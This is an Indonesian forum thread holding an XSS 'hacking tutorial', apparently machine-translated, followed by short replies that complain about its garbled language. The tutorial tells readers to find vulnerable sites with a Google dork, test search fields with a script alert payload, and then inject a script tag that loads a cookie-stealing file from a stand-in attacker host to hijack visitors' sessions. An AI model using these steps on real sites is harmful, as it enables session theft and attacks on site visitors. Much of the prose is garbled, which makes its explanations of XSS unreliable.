1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

XSS Hacking Tutorial

Discussion in 'Komputer' started by Fallah Nugraha, Aug 31, 2016.

  1. Fallah Nugraha

    Fallah Nugraha Newbie

    Joined:
    Aug 31, 2016
    Messages:
    3
    Likes Received:
    0
    XSSApa?
    XSS Apa hal pertama yang perlu Anda ketahui tentang hacking XSS? Cross site Scripting Dari sanksiptarupai XSS It Again CSS(Cascading Style sheet) Dan mengatakan. Cara di mana ia akan mengatakan. itu Web Application Vulnerability Salah satu yang paling populer. itu vulnerability Seorang hacker adalah sebuah situs client side scripts (Khusus Javascript)Telah diberikan izin untuk memasukkan. itu Salah satu kerentanan korban untuk hacker malicious codes, malware attack, phishing Dan lain-lain inject Dapat membawa.
    XSS Vulnerability and Injection
    ·Langkah 1: Vulnerable Situs web untuk mencari tahu
    Pertama, seorang hacker Vulnerable Lokasi temuan. dia pertama kali Google Berlangsung. kemudian dia Google Dorks menggunakan Vulnerable Situs untuk mencari tahu. Jika Anda mencari dengan berikut ini Google Dorks A.

    "search?q="

    Banyak dari Anda Vulnerable Situs ini dapat menemukan. Sekarang masukkan situs

    Langkah kedua: Vulnerability uji

    Sekarang kita telah memasuki situs, situs Vulnerability Akan memeriksa. Pertama posting di situs atau ebati parameter Untuk mengetahui. Mendapatkannya? Apakah Anda tahu menunggu, guys. Ini berarti bahwa Anda akan menemukan posting yang akan mengirimkan server situs. Sebagai contoh: search query, username, password.

    Vulnerability Ada dua cara untuk memeriksa.
    Metode 1: Metode pertama adalah kotak pencarian di situs injection The.
    Seorang hacker biasanya situs kotak pencarian utama malcious scriptMenulis, kemudian klik pada tombol pencarian. Untuk mencari malcious script T mulai bekerja pada.

    Metode dua: situs URL Dalam injeksi.
    Ini tidak bekerja di kotak pencarian. Hanya dalam URL. Sebagai contoh:
    http://vulnerablewebsite/search?q=malicious_script_goes_here
    Untuk menguji input fields Masukkan kode berikut.
    <script>alert('hi');</script>
    Periksa bagian atas kode dengan. Sebagai contoh:
    Metode pertama Anda mencari dengan mengetik ke dalam kotak pencarian di bagian atas kode di situs Anda untuk korban.
    Metode kedua Anda masuk ke situs korban dan menempatkan link. Sebagai contoh:-

    http://vulnerablewebsite/search?q=<script>alert('Hi');</script>
    Jika 'HI' ditulis dalam kotak pop-up datang. Ini berarti bahwa situs untuk XSS rentan.
    · Langkah 3: berbahaya Script tersedia
    Kerentanan adalah tes berikutnya setelah seorang hacker, script berbahaya pada injekata dilakukan korban. Kutipan dari situs dan mencuri cookie akan bekerja sama untuk menyerang malware.
    Sekarang situs hacker adalah naskah mencuri kue. Dia kemudian akan berbahaya url skrip

    http://attackerSite/malicious.js
    Sekarang hacker dapat menyuntikkan skrip malcious di situs rentan. Jika Anda memiliki URL
    <Script src = http: //attackerSite/malicious.js> </ script>

    Kemudian, ketika pengunjung situs akan mengunjungi situs, maka pekerjaan akan malcious naskah dan akan mulai mencuri cookie.

    Menurut dua jenis XSS biasanya bertahan kemampuan. Lain salah satu Persistent Non-Persistent
    Persistent XSS:

    Ini adalah yang paling rentan terhadap XSS kerentanan. Ini menyimpan data secara langsung dari server disimpan. Jadi, setiap kali Anda memberikan situs injeksi script jahat, bersama dengan aplikasi Web akan disimpan secara permanen. Ini akan menampilkan semua pengunjung lainnya itu. Jika Anda bukan korban situs web script berbahaya injeksi, maka itu adalah situs dari bhijitaraderao serangan. Sebagai contoh, beberapa situs, pengguna yang mengunjungi situs mereka untuk taktik menyimpan permintaan pencarian. Hasil XSS penyimpanan permanen. icon smile XSS tutorial lengkap (untuk pemula) Bagian 5
    Non-Persistent XSS:

    Banyak yang mengatakan itu Tercermin XSS. Itu sebabnya script berbahaya temparari. Pengunjung tidak akan dapat melihat Anda sebagai hasil dari script. Tapi ya, mereka adalah hacker yang menggunakan tips yang diberikan melalui suntikan ke script untuk menunjukkan pengunjung. Lucunya, mereka yang biasa pengunjung ke situs, tetapi mereka berpikir bahwa itu adalah link ke situs. Akibatnya, mereka ada, dan dia adalah korban hacking situs. Misalnya, jika Anda mencari beberapa hal di situs yang Anda lihat dalam string pencarian Anda untuk menunjukkan Anda lagi. Hasilnya adalah kode berbahaya sementara.
    Seorang hacker harus dilakukan dengan Kerentanan tersebut?
    Mandat untuk mencuri informasi rahasia dan berbeda.
    Melewati batasan situs saitera
    Session Hijacking
    Malware Attack
    Website Defacement
    Dos attacks
    XSS berbicara tentang harapan semua orang cukup. Beberapa akan menemukan tutorial. Semakin jelas Anda dapat mempelajari tentang XSS. Mungkin Kita lanjut di www.tutorialciplus.blogspot.com
     
  2. Rxmxdhxni

    Rxmxdhxni Ads.id Fan

    Joined:
    Aug 14, 2016
    Messages:
    232
    Likes Received:
    4
    Location:
    Banjarmasin
    Thanks infonya gan :D
     
  3. dadada

    dadada Super Hero

    Joined:
    Dec 10, 2013
    Messages:
    2,514
    Likes Received:
    999
    Ini yg bikin kepala ane mumet scriptnya, tutorialnya, atau bahasanya ya?.....

    :chicken:
    :heh?:
     
  4. Oby_One

    Oby_One Banned

    Joined:
    Jul 11, 2007
    Messages:
    5,080
    Likes Received:
    246
    Location:
    |Pulau Sabang - Aceh|
    Sama gan,..apa dari google translate ya,..

    Buat TS,..tenang aja ni forum gak harus dapet 3 likes dulu baru bisa post di marketplace, bukan kayak DP... :lol:
     
  5. pluto01

    pluto01 Super Hero

    Joined:
    Jun 17, 2013
    Messages:
    1,318
    Likes Received:
    72
    Location:
    Pekanbaru - Riau
    Google Translate detected,
    Bagusnya sich jika mau share ga masalah menggunakan google translate namun kalimatnya dirapikan dan disesuaikan agar yg baca mudah memahaminya
     

Share This Page